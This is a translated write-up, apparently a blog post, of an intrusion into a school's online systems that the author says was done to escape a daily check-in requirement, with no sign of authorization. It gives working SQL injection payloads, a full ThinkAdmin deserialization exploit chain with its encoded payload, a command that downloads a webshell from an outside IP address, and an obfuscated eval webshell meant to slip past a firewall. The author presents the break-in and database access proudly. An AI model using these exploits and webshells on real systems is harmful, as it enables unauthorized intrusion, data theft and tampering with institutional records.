Title: Defeat one by one! Take down the core system of the school

0x01 Introduction

Due to the epidemic, the school’s Yiban APP has added a check-in system, which requires morning inspection and afternoon inspection every day. If you forget it, you will have thousands of words to review.

I am deeply dissatisfied with this "formalism". I happened to have recently established a cybersecurity team, so I prepared to operate it.

0x02 Spots

We won’t say much about basic information collection

Therefore, different systems use multiple servers

It seems that it cannot be solved once and for all. It requires a wonderful school system penetration journey of various systems and servers to win the core system.

Then touch the core system

First, open the homepage of the "Yiban" system, this is what it looks like

It is not difficult to see that the developer has used the TP framework and has simply tested various TP injections.

RCE's payload ended in failure, and it seems that the safety awareness is not too bad

The home page under the domain name is completely an error-reporting page, without any functional points or information

As the saying goes, the quality of information collection directly determines the success or failure of our infiltration, so we must never be careless.

Let's first come to the fuzz first-level directory

The results are pretty good, with many catalogs and functional points.

Then we continued to fuzz the secondary directories of each first-level directory and constantly explore the functional points deployed under the domain name.

I won’t go to the picture for details, because there are too many first-level directories.

After understanding the functional points, take off your pants and start drying

0x03  Penetration of mental health system (IIS short file name-old login port-blasting-new login port-upload)

Blasting through the first-level catalogue, blasting out

http://xxx.xxx.edu.cn/psy This path

It was found that the psychological education health system was deployed, and the middleware was IIS

However, the mental health system login has a verification code mechanism, and the verification code is not easy to identify

I immediately thought of the iis short file name feature

Then use the iis short file name directory scanning tool

(https://github.com/lijiejie/IIS_shortname_Scanner) for scanning

Get the old login port of other system

http://xxx.xxx.edu.cn/psy/Login2.aspx

As shown in the figure, there is no verification code mechanism

Direct Burp Cluster bomb type blast

Successfully obtained the weak password admin of other systems, Aa123456

However, other pages of the old system have been deleted and cannot log in to the background normally

But it is speculated that the same database used by the old and new systems

Access to the new system

http://xxx.xxx.edu.cn/psy/Login.aspx

Use password admin, Aa123456 to log in successfully

Search for upload points in the background

Upload point is

http://xxx.xxx.edu.cn/psy/ScaleManage/ScaleEdit.aspx?ScaleListID=1

The topics added on the scale platform are uploaded in any file

(That's right, this upload point.it can be said to be quite hidden.it took a long time to find it)

Uploading aspx will jump inexplicably. Asp does not parse, and directly passes an asmx horse.

Execute commands through the debugging module of awvs 10

Permission is net service

Use cobaltstrike to directly powershell to go to permissions

The patch seems to be dead.

Various local rights promotions were launched once, but there was no use

Com components, you can't even raise the potatoes after they are put on. Let's do this first. If you raise the right, add it.

Mental health system announced initial acquisition

0x04 Live broadcast system interface injection

After entering the live broadcast system, I found that there was no point to use, and the development was probably not completed yet

But in BURP, I found a request for the ajax interface,

http request is as follows :

POST /index.php/Live/index/seat_ajax.html HTTP/1.1

Host: xxx.xxx.edu.cn

Content-Length: 24

Accept:/

Origin:http://xxx.xxx.edu.cn

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Linux; U; Android 5.1; zh-CN; 1501_M02 Build/LMY47D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.0.818 U3/0.8.0 Mobile Safari/534.30

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Referer:http://xxx.xxx.edu.cn/index.php/Live/index/seat?place_id=10active_id=20

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Cookie: ASP.NET_SessionId=s0clwrginz0rw3x0smtwtsgg; PHPSESSID=7985bf0a5f38e5922a651ac1f4ef9b1a; PHPSESSID=7985bf0a5f38e5922a651ac1f4ef9b1a

Connection: close

place_id=10active_id=20

Do fuzz to find SQLI Payload

Both id parameters have union injection

Construct payload

) UNION ALL SELECT NULL,NULL,NULL,NULL,user(),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Neqy

As shown in the figure, the current_user information was successfully obtained.

'[email protected]

Construct payload

place_id=10) UNION ALL SELECT NULL,NULL,NULL,NULL,group_concat(SCHEMA_NAME),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL from information_schema.schemata-- Neqyactive_id=20active_id=20

I won't demonstrate other tables, columns, and data here. It's OK to write a sentence, it's very simple.

Later I found that there were many libraries involved in other systems, but I didn’t find the library of the core system I wanted most.

0X05 A dull B64 upload

After the FUZZ function point, I found a place where I can upload pictures without authorization

http://xxx.xxx.edu.cn/v4/public/weui/demo/form12.html

Upload jpeg picture when data:image/jpeg is discovered

Change data directly to image/php, and then encode the uploaded content base64 and submit it

Getshell succeeded, SYSTEM permissions, and the escalation of rights were saved

0X06 Core system wonderful penetration (Nday deserialization + command execution bypass + conditional competition Getshell)

Searching, cold and deserted, miserable and miserable, finally found our core system of controlling "Yiban"

http://xxx.xxx.edu.cn/v4/public/index.php/admin/login.html?s=admin/api.Update/tree

Victory is right in front of you. You have to kill him even if you don't sleep

All kinds of fuzz and various operations were arranged together, but I found that it was useless and I still didn't go in every day.

Should I give up? Impossible, this is not our style

When I was carefully checking the page JS, I found such an interesting information

My eyes lit up, Damn ThinkAdmin, there was a deserialized Nday before, let's arrange it!

http://xxx.xxx.edu.cn/v4/public/index.php/admin/login.html?s=admin/api.Update/tree

PostData:

rules=a%3A2%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A11%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A13%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A13%3A%2 2%00%2A%00connection%22%3Bs%3A5%3A%22mysql%22%3Bs%3A7%3A%22%00%2A%00name%22%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A11%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A19%3A %22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A13%3A%22%00%2A%00connection%22%3Bs%3A5%3A%22mysql%22%3Bs%3A7%3A%22%00%2A%00name%22%3Bs%3A0%3A%22%22%3Bs%3A21%3A%22%00think%5CModel%00withAttr %22%3Ba%3A1%3A%7Bs%3A4%3A%22test%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A9%3A%22%00%2A%00hidden%22%3Ba%3A1%3A%7Bs%3A4%3A%22test%22%3Bs%3A3%3A%22123%22%3B%7Ds%3A17%3A%22%00think%5CModel%00data% 22%3Ba%3A1%3A%7Bs%3A4%3A%22test%22%3Bs%3A6%3A%22whoami%22%3B%7Ds%3A12%3A%22%00%2A%00withEvent%22%3Bb%3A0%3Bs%3A18%3A%22%00think%5CModel%00force%22%3Bb%3A1%3Bs%3A8%3A%22%00%2A%00field%22%3 Ba%3A0%3A%7B%7Ds%3A9%3A%22%00%2A%00schema%22%3Ba%3A0%3A%7B%7D%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A4%3A%22test%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A9%3A%22%00%2A%00 hidden%22%3Ba%3A1%3A%7Bs%3A4%3A%22test%22%3Bs%3A3%3A%22123%22%3B%7Ds%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A4%3A%22test%22%3Bs%3A6%3A%22whoami%22%3B%7Ds%3A12%3A%22%00%2A%00 withEvent%22%3Bb%3A0%3Bs%3A18%3A%22%00think%5CModel%00force%22%3Bb%3A1%3Bs%3A8%3A%22%00%2A%00field%22%3Ba%3A0%3A%7B%7Ds%3A9%3A%22%00%2A%00schema%22%3Ba%3A0%3A%7B%7D%7Di%3A1%3Bi%3A123%3B%7D //Execute whoami

The following is the deserialization pop chain as follows

?php

namespace think;

use think\model\Pivot;

abstract class Model{

private $lazySave=false; # save()

private $exists=false; # updateData()

protected $connection;

protected $name; # __toString() Conversion.php=Pivot

private $withAttr=[]; # assert

protected $hidden=[];

private $data=[];

protected $withEvent=false;

private $force=false;

protected $field=[];

protected $schema=[];

function __construct(){

$this-lazySave=true;

$this-exists=true;

$this-withEvent=false;

$this-force=true;

$this-connection='mysql';

$this-withAttr=['test'='system'];

$this-data=['test'='whoami'];

$this-hidden=['test'='123'];

$this-field=[];

$this-schema=[];

}

}

namespace think\model;

use think\Model;

\# Model is an abstract class. We find its inheritance class. Here we select the Pivot class

class Pivot extends Model{

function __construct($obj=''){

parent:__construct();

$this-name=$obj; # $this-name puts the value in the subclass constructor, and directly puts the base class attribute to initialize it without success

}

}

$a=new Pivot();

echo urlencode(serialize([new Pivot($a),123]));

The permission is system, hahahahahahaha, God helps me too

But I encountered many problems in writing shells using echo command

The command cannot have spaces, and the shell is written directly in a command, otherwise an error will be reported.

The space will be converted to + and the backend cannot recognize it

After persistent manual testing, it is found that /\ can bypass the limit of spaces

Then use the splicing command to achieve bypassing write detection

But the target machine has a waf, and an ordinary webshell will be killed after a few seconds.

Why not? Download the webshell without killing directly through conditional competition

The constructor downloads the shell without killing through conditional competition

echo/^^?phps1.phpecho/file_put_contents('s2.php',file_get_contents('http://49.x.x.x:8080/shell.txt'));^gt;gt;gt;s2.php

The content of the shell is as follows

?php

function test($php_c0d3){

$password='skr';//EnvPwd

$cr=preg_filter('/\s+/','','c h r');

$bs64=preg_filter('/\s+/','','bas e64 _de cod e');

$gzi=$cr(103).$cr(122).$cr(105).$cr(110);

$gzi.=$cr(102).$cr(108).$cr(97).$cr(116).$cr(101);

$c=$bs64($php_c0d3);

$c=$gzi($c);

@eval($c);

}

$php_c0d3='S0lNy8xL1VAvzkjNySlILC5W11EBUeX'.

'5RSma1rxcKgWZeWm2KvFBroGhrsEh0UogvlIsUC'.

'YzTQMiaatUmVqspFnNy1WQARLI1wBprAXi1LLEH'.

'A2EXrgdsZrWAA==';

test($php_c0d3);

? Generate Postdata by deserializing pop chains

Call it directly

http://xxx.xxx.edu.cn/v4/public/s2.php

Password Skr

Take it directly

Finally got this check-in, late call, attendance core system, adminer entered the library to decrypt the administrator password

Damn, do you still want me to write a review? Go and eat shit